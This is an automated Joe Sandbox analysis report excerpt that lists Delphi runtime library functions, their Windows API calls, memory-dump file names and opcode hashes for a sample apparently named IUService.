                                                                                                                                            • API ID: System@$System@@$RaiseString$Except$qqrvException@$bctr$qqrp20Sysutils@$Recpx14Recxi$AfterArrayClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucLength$qqrvList$qqrvLoadMetaObjectString$qqrp20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 434768823-0
                                                                                                                                            • Opcode ID: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                                                            • Instruction ID: 10693105d4530467d70705bbd3336f9fa5ff1ffcd69f97b7e410178babc29af3
                                                                                                                                            • Opcode Fuzzy Hash: 70035ba3cdc4d1b591e6ff713689efda533d35203e273b787accabacad4fdffb
                                                                                                                                            • Instruction Fuzzy Hash: 8E219531E06685ABEB10DFD9FCD1BADB7B8AB54304F50816AF90497352CB715D058BA0
                                                                                                                                            Function 500119D8 Relevance: 13.6, APIs: 9, Instructions: 67threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011A8B), ref: 50011A03
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,50011A8B), ref: 50011A08
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011A8B), ref: 50011A27
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011A8B), ref: 50011A51
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011A8B), ref: 50011A5B
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A67
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A70
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3094671988-0
                                                                                                                                            • Opcode ID: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                                                            • Instruction ID: 64e016724a4648d9eccdf5b5c7b5b498823f636818398dbbc543729642361fab
                                                                                                                                            • Opcode Fuzzy Hash: 61edf3dfb67e96cd3ce6b600e90b04d6ddfba1988f50e1faa7fba45ec40b8dee
                                                                                                                                            • Instruction Fuzzy Hash: 01118770A01285AFEF05DFF9DC9199EBBF8EF49210B9446A6F940E3311D730AE40DA91
                                                                                                                                            Function 50011AAC Relevance: 13.6, APIs: 9, Instructions: 67threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011B5F), ref: 50011AD7
                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,50011B5F), ref: 50011ADC
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011B5F), ref: 50011AFB
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011B5F), ref: 50011B25
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011B5F), ref: 50011B2F
                                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B3B
                                                                                                                                            • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3094671988-0
                                                                                                                                            • Opcode ID: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                                                            • Instruction ID: aa116bdb757719b18d0b9449cf26451f3ca687c3b180189956f3d9f0d1195bcc
                                                                                                                                            • Opcode Fuzzy Hash: bb35b1ec3dee52f85de0abe14dd36a5b07772a894f879ccd0841f78612b6cb55
                                                                                                                                            • Instruction Fuzzy Hash: 64118470A05285AFEF04DFA9DDD299EB7F8EF59210B5442A6F900E3311E730AE40DA91
                                                                                                                                            Function 50036250 Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 50036286
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 5003629E
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362A5
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362B1
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362BF
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362D6
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362E1
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 500362F0
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003199A,00000000,500319BA,?,?,00000000,?,50031CC6), ref: 50036300
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$Interface%IntfSystem@@$Variants@$Clear$qqrr45$CastCopy$qqrr45CustomError$qqrxusxusInterface%x45Variant$FindInterface$qqrrx5_Object@TypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3781657090-0
                                                                                                                                            • Opcode ID: c8c5d2b16f66d087c23e02335a348befe5977fe6b2bc143d03b60feb3e5f1714
                                                                                                                                            • Instruction ID: 34bdf9ec822abdc4dce8ecfe916eb70bc0954c188ba1b176e15556ef215147c4
                                                                                                                                            • Opcode Fuzzy Hash: c8c5d2b16f66d087c23e02335a348befe5977fe6b2bc143d03b60feb3e5f1714
                                                                                                                                            • Instruction Fuzzy Hash: 5411C2503098E14F9A03ABA8D6455EF62C18F56624F12C363F904CB61ACFA9CD4A83E2
                                                                                                                                            Function 5002F388 Relevance: 13.6, APIs: 9, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3B8
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CA
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CF
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3DE
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F5
                                                                                                                                            • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F407
                                                                                                                                              • Part of subcall function 5002F438: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                                                              • Part of subcall function 5002F438: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                                                              • Part of subcall function 5002F438: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                                                              • Part of subcall function 5002F438: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                                                              • Part of subcall function 5002F438: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F40C
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$Unicode$System@@$Raise$ArrayError@$bctr$qqrlx20Except$qqrvLoadSafeString$qqrp20Varutils@$Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Error$qqrucException@$bctr$qqrx20Format$qqrx20List$qqrvMetaRecxiStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2318074137-0
                                                                                                                                            • Opcode ID: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                                                            • Instruction ID: bc5804b8ea2ea52ee02b52fff60dedcdbde60d4b00371caa1661321ee3d8b552
                                                                                                                                            • Opcode Fuzzy Hash: 2fc197e72b512a73204bf5c851bd90a70b0a5406eff194070ecd408d08181925
                                                                                                                                            • Instruction Fuzzy Hash: F81108316021C25BE720EFA8FCA3A7FB3E9EB58240FA00276F504C3252C6B16D018761
                                                                                                                                            Function 5000D428 Relevance: 13.6, APIs: 9, Instructions: 55stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D446
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D455
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D461
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D46A
                                                                                                                                            • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D474
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D485
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D491
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D49B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$Char$qqrx20Unicode$qqrpbuipcuiUtf8lstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1537582155-0
                                                                                                                                            • Opcode ID: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                                                            • Instruction ID: 1243ab6cbdefdf8345f412232093dd449079060f735b143d8bc3f4c3f6575941
                                                                                                                                            • Opcode Fuzzy Hash: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                                                            • Instruction Fuzzy Hash: E101F534601A84ABFB11DBA5D8B299EB3E9DFA4210FE58773B50097212DB74EE01D1E4
                                                                                                                                            Function 5003631C Relevance: 13.6, APIs: 9, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003633E
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036356
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003635D
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036369
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036377
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036383
                                                                                                                                              • Part of subcall function 5003B6A4: EnterCriticalSection.KERNEL32(500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3,?,?,?,?,00000000,00000000,00000000), ref: 5003B6DA
                                                                                                                                              • Part of subcall function 5003B6A4: @System@@DynArrayLength$qqrv.RTL120(00000000,5003B74C,?,500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3), ref: 5003B6F2
                                                                                                                                              • Part of subcall function 5003B6A4: LeaveCriticalSection.KERNEL32(500A8E3C,5003B753,?,500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3), ref: 5003B746
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003638E
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003639D
                                                                                                                                              • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                                                              • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 500363AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$System@@$Interface%Intf$Clear$qqrr45Variants@$CastCopy$qqrr45CriticalCustomError$qqrxusxusInterface%x45Object@SectionVariant$ArrayEnterEntry$qqrrx5_FindInterfaceInterface$qqrrx5_LeaveLength$qqrvTypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 51746642-0
                                                                                                                                            • Opcode ID: 111d1bd1a72e71e83d2ab9bdd4abfcded7f0651f7ae7179b8c71a1e186a9c31a
                                                                                                                                            • Instruction ID: 446bae114840e30f26b3b664076e927c87e989805c5bfb182e6f535140cd3d56
                                                                                                                                            • Opcode Fuzzy Hash: 111d1bd1a72e71e83d2ab9bdd4abfcded7f0651f7ae7179b8c71a1e186a9c31a
                                                                                                                                            • Instruction Fuzzy Hash: E30180043190904FDB12A7A8E5515FD72D1DF56624F10C353B5408B317CB69CE8693E6
                                                                                                                                            Function 50008224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: T@P
                                                                                                                                            • API String ID: 0-2218095447
                                                                                                                                            • Opcode ID: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                                                            • Instruction ID: 27dc2a38aba9eb27cd1e85926dff11305057f2316d7a6dc2ed62153db4641c43
                                                                                                                                            • Opcode Fuzzy Hash: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                                                            • Instruction Fuzzy Hash: ED51B934900B80CFF724CFA8EC64B867BE0BB45320F81472EE98587262DB759884CB65
                                                                                                                                            Function 500085B4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000860A
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008617
                                                                                                                                            • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000861C
                                                                                                                                            • @System@UnregisterModule$qqrp17System@TLibModule.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008644
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000865C
                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008694
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$AcquireExceptionObject$qqrv$ExitFreeFree$qqrvLibraryModuleModule$qqrp17Object@ProcessUnregister
                                                                                                                                            • String ID: T@P
                                                                                                                                            • API String ID: 3627422618-2218095447
